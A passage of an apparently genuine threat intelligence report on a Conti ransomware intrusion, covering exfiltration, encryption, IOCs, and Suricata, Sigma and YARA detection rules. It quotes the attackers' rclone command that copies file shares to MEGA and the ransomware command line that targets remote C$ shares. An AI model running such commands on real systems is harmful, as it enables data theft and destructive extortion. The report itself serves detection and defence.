class="hljs-attribute">bUsesCookies</span>": <span class="hljs-value"><span class="hljs-string">"True"</span></span>, "<span class="hljs-attribute">HostHeader</span>": <span class="hljs-value"><span class="hljs-string">""</span></span>} </code></pre> <h3 id="exfiltration">Exfiltration</h3> <p>Once the attackers established access to critical assets, they used RClone to exfiltrate sensitive data to a cloud storage space named <a href="https://mega.io/" target="_blank" rel="noopener">MEGA</a>. 
The full command used by Rclone includes a variety of parameters, including one that sets the bandwidth limit.</p> <pre><code>rclone.exe copy --max-age <span class="hljs-number">2</span>y <span class="hljs-string">"\\SERVER\Shares"</span> Mega:DATA -q --ignore-existing --<span class="hljs-keyword">auto</span>-confirm --multi-thread-streams <span class="hljs-number">7</span> --transfers <span class="hljs-number">7</span> --bwlimit <span class="hljs-number">10</span>M </code></pre> <p>RClone continues to be an effective tool for bulk data exfiltration. NCC Group has provided a <a href="https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/" target="_blank" rel="noopener">detailed write-up</a> of the Rclone application and detection methods.</p> <p>The Rclone activity was observed on two separate occasions, each lasting around three hours and occurring between 1900 and 2200 UTC.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/509f3eb0a90b9b0912db53aa28219919244632a50c04e3d810a0acf874db241d.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4758" src="https://thedfirreport.com/wp-content/uploads/2021/11/509f3eb0a90b9b0912db53aa28219919244632a50c04e3d810a0acf874db241d.png" alt="" width="196" height="158" /></a></p> <hr /> <h3 id="impact">Impact</h3> <p>On the fifth day, the threat actors moved to their final actions: encrypting the domain. They first pinged systems across the network via an interactive command shell. <a href="https://www.iobit.com/en/iobit-unlocker.php">Iobit unlocker</a> was also dropped during this phase, but we did not see it used. 
After pinging systems, the threat actors opened a batch file that was ultimately used to launch the Conti ransomware.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/f3a3a919075ac160b8b18838ec9cef851eafe21ccb08c306f068ef7b0f6dead3.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4745" src="https://thedfirreport.com/wp-content/uploads/2021/11/f3a3a919075ac160b8b18838ec9cef851eafe21ccb08c306f068ef7b0f6dead3.png" alt="" width="546" height="118" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/f3a3a919075ac160b8b18838ec9cef851eafe21ccb08c306f068ef7b0f6dead3.png 546w, https://thedfirreport.com/wp-content/uploads/2021/11/f3a3a919075ac160b8b18838ec9cef851eafe21ccb08c306f068ef7b0f6dead3-300x65.png 300w" sizes="auto, (max-width: 546px) 100vw, 546px" /></a></p> <p>locker.bat is a bespoke script designed to encrypt files across a number of hosts:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/7b9e7c4d301dcb9922a9995615a03d6cbea55c1a141d820f909f68fd95414d96"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/7b9e7c4d301dcb9922a9995615a03d6cbea55c1a141d820f909f68fd95414d96" alt="enter image description here" width="1227" height="339" /></a></p> <hr /> <p>Based on the contents of the file, we assess that the actors were likely making last-minute adjustments, informed by the ping results, before executing the ransomware.</p> <p>The ransomware was then launched from the backup server.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/9cc86be7737f8d74a5bfd4da00fb46d2c3d899ebdc0475dccb0792932e3d1235"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/9cc86be7737f8d74a5bfd4da00fb46d2c3d899ebdc0475dccb0792932e3d1235" alt="enter image description here" width="354" height="26" /></a></p> <hr 
/> <p>To encrypt systems, the ransomware mounted the C$ share of each target host and then performed its encryption routine.</p> <pre>C:\o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe -m -net -size 10 -nomutex -p \\TARGETHOST\C$</pre> <p>Here’s an overview of the execution:</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4804" src="https://thedfirreport.com/wp-content/uploads/2021/11/123.png" alt="" width="2697" height="1140" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/123.png 2697w, https://thedfirreport.com/wp-content/uploads/2021/11/123-300x127.png 300w, https://thedfirreport.com/wp-content/uploads/2021/11/123-1024x433.png 1024w, https://thedfirreport.com/wp-content/uploads/2021/11/123-768x325.png 768w, https://thedfirreport.com/wp-content/uploads/2021/11/123-1536x649.png 1536w, https://thedfirreport.com/wp-content/uploads/2021/11/123-2048x866.png 2048w" sizes="auto, (max-width: 2697px) 100vw, 2697px" /></p> <p>Analysis of the DLLs accompanying the EXE indicates Conti artifacts:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/501735cefb3cc7d0b08f983c8a57b193267d9d1f2d49b9809e333aa15e4abd9b"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/501735cefb3cc7d0b08f983c8a57b193267d9d1f2d49b9809e333aa15e4abd9b" alt="enter image description here" width="229" height="110" /></a></p> <hr /> <p>Once the encryption was completed, the following ransom note was dropped in all affected directories as ‘readme.txt’:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/145eb3e900a27ad1bb6ebc7ba77c7ef2da278e0aa28ac69b0a995caad10ade27"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/145eb3e900a27ad1bb6ebc7ba77c7ef2da278e0aa28ac69b0a995caad10ade27" alt="enter image 
description here" width="369" height="23" /></a></p> <hr /> <p>The content of these text files:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/ecaecfdb88f5ae8a174538af1ada8f5235a885544520ee0c01905f1e861b3310"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/ecaecfdb88f5ae8a174538af1ada8f5235a885544520ee0c01905f1e861b3310" alt="enter image description here" width="685" height="410" /></a></p> <hr /> <p>Following the execution of the locker ransomware, the attacker then conducted a file listing discovery against multiple hosts – likely to validate and assess that the locker encryption was successful:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/6cd18842629e69c9e3ce73f5af6192b42e43492f72dee865acb7c5c2077f0a37"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/6cd18842629e69c9e3ce73f5af6192b42e43492f72dee865acb7c5c2077f0a37" alt="enter image description here" width="609" height="217" /></a></p> <h2 id="iocs">IOCs</h2> <h3 id="network">Network</h3> <pre><strong>BazarLoader</strong> 64.227.69.92|443 161.35.155.92|443 161.35.147.110|443 64.227.65.60|443 <strong>Loader download</strong> millscruelg.com 45.95.11.133|80 <strong>Cobalt Strike</strong> volga.azureedge.net five.azureedge.net checkauj.com 82.117.252.143|443 82.117.252.143|80</pre> <h3 id="files">Files</h3> <pre>decree-08.03.2021.doc f6f72e3d91f7b53dd75e347889a793da 5d4f020115a483e9e5aa9778c038466f9014c90c 14bccfecaaec8353e3e8f090ec1d3e9c87eb8ceb2a7abedfc47c3c980da8ad71 compareForFor.hta 193b84d45dd371c6e4a501333d37349b 742ed8d0202aafba1c162537087a8a131cb85cde fb38061bf601001c45aafe8d0c5feaa22c607d2ff79cfb841788519ca55a17b4 D8B3.dll 4ba6791f2293a8bc2dfa537015829b3c d4f5cc55b6fa25f9a45ba7e968438b97e33aefbc 4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6 
D574.dll 663c8d0fe8b770b50792d10f6c07a652 d0361fbcebe59205b2ea6a31041c89464a5e61b6 1872bf6c974e9b11040851f7d30e5326afdc8b13802891c222af4368a14f829c 143.dll ab3a744545a12ba2f6789e94b789666a 1d5f8d283ed3f6019954aa480182c9913ee49735 6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610 ProcessHacker.exe 68f9b52895f4d34e74112f3129b3b00d c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f locker.bat 84361813423910294079d0bc5b6daba2 c0b28fd2d5b62d5129225e8c45d368bc9e9fd415 1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3 o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe 7f112bfa16a6bd344aaed28abf606780 eaa792a1c9f1d277af3d88bd9ea17a33275308f3 9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219 o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll 2c313c5b532c905eb8f1748a0d656ff9 70725329e4c14b39d49db349f3c84e055c111f2d 31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll 26bd89afd5c1ba9803422d33185cef89 c99f0fa8d5fbffe5288aaff84dbe980c412ba34e 01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9 AnyDesk.exe e6c3ab2ee9a613efdf995043b140fd8e 33738cf695a6ac03675fe925d62ecb529ac73d03 8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7 unlocker.exe 5840aa36b70b7c03c25e5e1266c5835b ea031940b2120551a6abbe125eb0536b9e4f14c8 09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53 rclone.exe 9066cfcf809bb19091509a4d0f15f092 f88a948b0fd137d4b14cf5aec0c08066cb07e08d 9b5d1f6a94ce122671a5956b2016e879428c74964174739b68397b6384f6ee8b<code></code></pre> <h3 id="suricata">Suricata</h3> <pre><code>ET TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile Response ETPRO TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile M2<span class="hljs-operator"> ET <span class="hljs-keyword">POLICY</span> SSL/TLS Certificate 
Observed (AnyDesk Remote Desktop Software) ET USER_AGENTS AnyDesk Remote Desktop Software <span class="hljs-keyword">User</span>-<span class="hljs-keyword">Agent</span> ET <span class="hljs-keyword">POLICY</span> <span class="hljs-keyword">HTTP</span> POST <span class="hljs-keyword">to</span> MEGA Userstorage </span></code></pre> <h3 id="sigma">Sigma</h3> <pre><code><a href="https://gist.github.com/beardofbinary/fede0607e830aa1add8deda3d59d9a77" target="_blank" rel="noopener">rclone_execution.yaml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/sysmon_in_memory_powershell.yml" target="_blank" rel="noopener">sysmon_in_memory_powershell.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_wmic_proc_create_rundll32.yml" target="_blank" rel="noopener">win_susp_wmic_proc_create_rundll32.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml" target="_blank" rel="noopener">sysmon_abusing_debug_privilege.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_trust_discovery.yml" target="_blank" rel="noopener">win_trust_discovery.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_office_shell.yml" target="_blank" rel="noopener">win_office_shell.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_mshta_spawn_shell.yml" target="_blank" rel="noopener">win_mshta_spawn_shell.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_net_execution.yml" target="_blank" rel="noopener">win_susp_net_execution.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml" target="_blank" rel="noopener">win_susp_regsvr32_anomalies.yml</a> <a 
href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/sysmon_rundll32_net_connections.yml" target="_blank" rel="noopener">sysmon_rundll32_net_connections.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_net_enum.yml" target="_blank" rel="noopener">win_net_enum.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_wmi_execution.yml" target="_blank" rel="noopener">win_susp_wmi_execution.yml</a></code></pre> <h3 id="yara">Yara</h3> <pre><code><span class="hljs-comment">/* YARA Rule Set Author: TheDFIRReport Date: 2021-11-29 Identifier: 5794 */</span> <span class="hljs-comment">/* Rule Set ----------------------------------------------------------------- */</span> rule mal_host2_143 { meta: description = <span class="hljs-string">"mal - file 143.dll"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610"</span> strings: <span class="hljs-variable">$x1</span> = <span class="hljs-string">"object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base = runtime: gp: gp="</span> ascii <span class="hljs-variable">$x2</span> = <span class="hljs-string">"slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to palloc"</span> ascii <span class="hljs-variable">$x3</span> = <span class="hljs-string">" to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurrentDirectoryWGetFileA"</span> ascii <span class="hljs-variable">$x4</span> = <span class="hljs-string">"Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuer"</span> ascii <span 
class="hljs-variable">$x5</span> = <span class="hljs-string">"GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFileabi mismatchadvapi32"</span> ascii <span class="hljs-variable">$x6</span> = <span class="hljs-string">"lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnableunexpected f"</span> ascii <span class="hljs-variable">$x7</span> = <span class="hljs-string">"unknown pcws2_32.dll of size (targetpc= KiB work, freeindex= gcwaiting= heap_live= idleprocs= in status mallocing= ms clock"</span> ascii <span class="hljs-variable">$x8</span> = <span class="hljs-string">"file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negativ"</span> ascii <span class="hljs-variable">$x9</span> = <span class="hljs-string">".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign requested addresscasg"</span> ascii <span class="hljs-variable">$x10</span> = <span class="hljs-string">"Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overf"</span> ascii <span class="hljs-variable">$x11</span> = <span class="hljs-string">"entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.pushmadvdontneedmheapSpe"</span> ascii <span class="hljs-variable">$x12</span> = <span class="hljs-string">"ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperation c"</span> ascii <span class="hljs-variable">$s13</span> = <span class="hljs-string">"y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierrunt"</span> ascii <span class="hljs-variable">$s14</span> = <span 
class="hljs-string">"ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total, [recovered] allocCount found at *( gcscandone m->gs"</span> ascii <span class="hljs-variable">$s15</span> = <span class="hljs-string">".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegc"</span> fullword ascii <span class="hljs-variable">$s16</span> = <span class="hljs-string">"ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS specific errorSetFile"</span> ascii <span class="hljs-variable">$s17</span> = <span class="hljs-string">"mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile already closedfile alr"</span> ascii <span class="hljs-variable">$s18</span> = <span class="hljs-string">"structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \"GetQueuedCompletionStatus_cg"</span> ascii <span class="hljs-variable">$s19</span> = <span class="hljs-string">"garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over mar"</span> ascii <span class="hljs-variable">$s20</span> = <span class="hljs-string">"tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad notifyList sizebad "</span> ascii condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x5a4d</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">4000</span>KB <span class="hljs-keyword">and</span> <span class="hljs-number">1</span> of (<span class="hljs-variable">$x</span>*) <span class="hljs-keyword">and</span> all of them } rule mal_host1_D8B3 { meta: description = <span class="hljs-string">"mal - file D8B3.dll"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span 
class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6"</span> strings: <span class="hljs-variable">$x1</span> = <span class="hljs-string">"object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base = runtime: gp: gp="</span> ascii <span class="hljs-variable">$x2</span> = <span class="hljs-string">"slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to palloc"</span> ascii <span class="hljs-variable">$x3</span> = <span class="hljs-string">" to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurrentDirectoryWGetFileA"</span> ascii <span class="hljs-variable">$x4</span> = <span class="hljs-string">"Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuer"</span> ascii <span class="hljs-variable">$x5</span> = <span class="hljs-string">"GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFileabi mismatchadvapi32"</span> ascii <span class="hljs-variable">$x6</span> = <span class="hljs-string">"lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnableunexpected f"</span> ascii <span class="hljs-variable">$x7</span> = <span class="hljs-string">"unknown pcws2_32.dll of size (targetpc= KiB work, freeindex= gcwaiting= heap_live= idleprocs= in status mallocing= ms clock"</span> ascii <span class="hljs-variable">$x8</span> = <span class="hljs-string">"file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negativ"</span> ascii <span class="hljs-variable">$x9</span> = <span class="hljs-string">".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go 
runtimecannot assign requested addresscasg"</span> ascii <span class="hljs-variable">$x10</span> = <span class="hljs-string">"Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overf"</span> ascii <span class="hljs-variable">$x11</span> = <span class="hljs-string">"entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.pushmadvdontneedmheapSpe"</span> ascii <span class="hljs-variable">$x12</span> = <span class="hljs-string">"ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperation c"</span> ascii <span class="hljs-variable">$s13</span> = <span class="hljs-string">"y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierrunt"</span> ascii <span class="hljs-variable">$s14</span> = <span class="hljs-string">"ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total, [recovered] allocCount found at *( gcscandone m->gs"</span> ascii <span class="hljs-variable">$s15</span> = <span class="hljs-string">".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegc"</span> fullword ascii <span class="hljs-variable">$s16</span> = <span class="hljs-string">"ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS specific errorSetFile"</span> ascii <span class="hljs-variable">$s17</span> = <span class="hljs-string">"mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile already closedfile alr"</span> ascii <span class="hljs-variable">$s18</span> = <span class="hljs-string">"structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \"GetQueuedCompletionStatus_cg"</span> ascii <span class="hljs-variable">$s19</span> = 
<span class="hljs-string">"garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over mar"</span> ascii <span class="hljs-variable">$s20</span> = <span class="hljs-string">"tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad notifyList sizebad "</span> ascii condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x5a4d</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">4000</span>KB <span class="hljs-keyword">and</span> <span class="hljs-number">1</span> of (<span class="hljs-variable">$x</span>*) <span class="hljs-keyword">and</span> all of them } rule mal_host2_AnyDesk { meta: description = <span class="hljs-string">"mal - file AnyDesk.exe"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7"</span> strings: <span class="hljs-variable">$x1</span> = <span class="hljs-string">"<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" pu"</span> ascii <span class="hljs-variable">$x2</span> = <span class="hljs-string">"C:\\Buildbot\\ad-windows-32\\build\\release\\app-32\\win_loader\\AnyDesk.pdb"</span> fullword ascii <span class="hljs-variable">$s3</span> = <span class="hljs-string">"<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" pu"</span> ascii <span class="hljs-variable">$s4</span> = <span class="hljs-string">"<assemblyIdentity version=\"6.3.2.0\" processorArchitecture=\"x86\" name=\"AnyDesk.AnyDesk.AnyDesk\" type=\"win32\" />"</span> fullword ascii <span class="hljs-variable">$s5</span> = <span 
class="hljs-string">"4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O"</span> fullword ascii <span class="hljs-variable">$s6</span> = <span class="hljs-string">"(Symantec SHA256 TimeStamping Signer - G3"</span> fullword ascii <span class="hljs-variable">$s7</span> = <span class="hljs-string">"(Symantec SHA256 TimeStamping Signer - G30"</span> fullword ascii <span class="hljs-variable">$s8</span> = <span class="hljs-string">"http://ocsp.digicert.com0N"</span> fullword ascii <span class="hljs-variable">$s9</span> = <span class="hljs-string">"http://www.digicert.com/CPS0"</span> fullword ascii <span class="hljs-variable">$s10</span> = <span class="hljs-string">"Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0"</span> fullword ascii <span class="hljs-variable">$s11</span> = <span class="hljs-string">"<description>AnyDesk screen sharing and remote control software.</description>"</span> fullword ascii <span class="hljs-variable">$s12</span> = <span class="hljs-string">"/http://crl3.digicert.com/sha2-assured-cs-g1.crl05"</span> fullword ascii <span class="hljs-variable">$s13</span> = <span class="hljs-string">"/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L"</span> fullword ascii <span class="hljs-variable">$s14</span> = <span class="hljs-string">"%jgmRhZl%"</span> fullword ascii <span class="hljs-variable">$s15</span> = <span class="hljs-string">"5ZW:\"Wfh"</span> fullword ascii <span class="hljs-variable">$s16</span> = <span class="hljs-string">"5HRe:\\"</span> fullword ascii <span class="hljs-variable">$s17</span> = <span class="hljs-string">"ysN.JTf"</span> fullword ascii <span class="hljs-variable">$s18</span> = <span class="hljs-string">"Z72.irZ"</span> fullword ascii <span class="hljs-variable">$s19</span> = <span class="hljs-string">"Ve:\\-Sj7"</span> fullword ascii <span class="hljs-variable">$s20</span> = <span class="hljs-string">"ekX.cFm"</span> fullword ascii condition: uint16(<span class="hljs-number">0</span>) == <span 
class="hljs-number">0x5a4d</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">11000</span>KB <span class="hljs-keyword">and</span> <span class="hljs-number">1</span> of (<span class="hljs-variable">$x</span>*) <span class="hljs-keyword">and</span> <span class="hljs-number">4</span> of them } rule ProcessHacker { meta: description = <span class="hljs-string">"mal - file ProcessHacker.exe"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f"</span> strings: <span class="hljs-variable">$x1</span> = <span class="hljs-string">"Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe"</span> fullword wide <span class="hljs-variable">$x2</span> = <span class="hljs-string">"D:\\Projects\\processhacker2\\bin\\Release32\\ProcessHacker.pdb"</span> fullword ascii <span class="hljs-variable">$x3</span> = <span class="hljs-string">"ProcessHacker.exe"</span> fullword wide <span class="hljs-variable">$x4</span> = <span class="hljs-string">"kprocesshacker.sys"</span> fullword wide <span class="hljs-variable">$x5</span> = <span class="hljs-string">"ntdll.dll!NtDelayExecution"</span> fullword wide <span class="hljs-variable">$x6</span> = <span class="hljs-string">"ntdll.dll!ZwDelayExecution"</span> fullword wide <span class="hljs-variable">$s7</span> = <span class="hljs-string">"PhInjectDllProcess"</span> fullword ascii <span class="hljs-variable">$s8</span> = <span class="hljs-string">"_PhUiInjectDllProcess@8"</span> fullword ascii <span class="hljs-variable">$s9</span> = <span class="hljs-string">"logonui.exe"</span> fullword wide <span class="hljs-variable">$s10</span> = <span class="hljs-string">"Executable files (*.exe;*.dll;*.ocx;*.sys;*.scr;*.cpl)"</span> fullword wide <span class="hljs-variable">$s11</span> = <span 
class="hljs-string">"\\x86\\ProcessHacker.exe"</span> fullword wide <span class="hljs-variable">$s12</span> = <span class="hljs-string">"user32.dll!NtUserGetMessage"</span> fullword wide <span class="hljs-variable">$s13</span> = <span class="hljs-string">"ntdll.dll!NtWaitForKeyedEvent"</span> fullword wide <span class="hljs-variable">$s14</span> = <span class="hljs-string">"ntdll.dll!ZwWaitForKeyedEvent"</span> fullword wide <span class="hljs-variable">$s15</span> = <span class="hljs-string">"ntdll.dll!NtReleaseKeyedEvent"</span> fullword wide <span class="hljs-variable">$s16</span> = <span class="hljs-string">"ntdll.dll!ZwReleaseKeyedEvent"</span> fullword wide <span class="hljs-variable">$s17</span> = <span class="hljs-string">"\\kprocesshacker.sys"</span> fullword wide <span class="hljs-variable">$s18</span> = <span class="hljs-string">"\\SystemRoot\\system32\\drivers\\ntfs.sys"</span> fullword wide <span class="hljs-variable">$s19</span> = <span class="hljs-string">"_PhExecuteRunAsCommand2@36"</span> fullword ascii <span class="hljs-variable">$s20</span> = <span class="hljs-string">"_PhShellExecuteUserString@20"</span> fullword ascii condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x5a4d</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">4000</span>KB <span class="hljs-keyword">and</span> <span class="hljs-number">1</span> of (<span class="hljs-variable">$x</span>*) <span class="hljs-keyword">and</span> <span class="hljs-number">4</span> of them } rule unlocker { meta: description = <span class="hljs-string">"mal - file unlocker.exe"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53"</span> strings: <span class="hljs-variable">$s1</span> = <span class="hljs-string">"For more detailed information, 
please visit http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline"</span> fullword wide <span class="hljs-variable">$s2</span> = <span class="hljs-string">"(Symantec SHA256 TimeStamping Signer - G20"</span> fullword ascii <span class="hljs-variable">$s3</span> = <span class="hljs-string">" <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>"</span> fullword ascii <span class="hljs-variable">$s4</span> = <span class="hljs-string">"(Symantec SHA256 TimeStamping Signer - G2"</span> fullword ascii <span class="hljs-variable">$s5</span> = <span class="hljs-string">"Causes Setup to create a log file in the user's TEMP directory."</span> fullword wide <span class="hljs-variable">$s6</span> = <span class="hljs-string">"Prevents the user from cancelling during the installation process."</span> fullword wide <span class="hljs-variable">$s7</span> = <span class="hljs-string">"Same as /LOG, except it allows you to specify a fixed path/filename to use for the log file."</span> fullword wide <span class="hljs-variable">$s8</span> = <span class="hljs-string">" <dpiAware xmlns=\"http://schemas.microsoft.com/SMI/2005/WindowsSettings\">true</dpiAware>"</span> fullword ascii <span class="hljs-variable">$s9</span> = <span class="hljs-string">"The Setup program accepts optional command line parameters."</span> fullword wide <span class="hljs-variable">$s10</span> = <span class="hljs-string">"Instructs Setup to load the settings from the specified file after having checked the command line."</span> fullword wide <span class="hljs-variable">$s11</span> = <span class="hljs-string">"Overrides the default component settings."</span> fullword wide <span class="hljs-variable">$s12</span> = <span class="hljs-string">"/MERGETASKS=\"comma separated list of task names\""</span> fullword wide <span class="hljs-variable">$s13</span> = <span class="hljs-string">"/PASSWORD=password"</span> fullword wide <span class="hljs-variable">$s14</span> = <span 
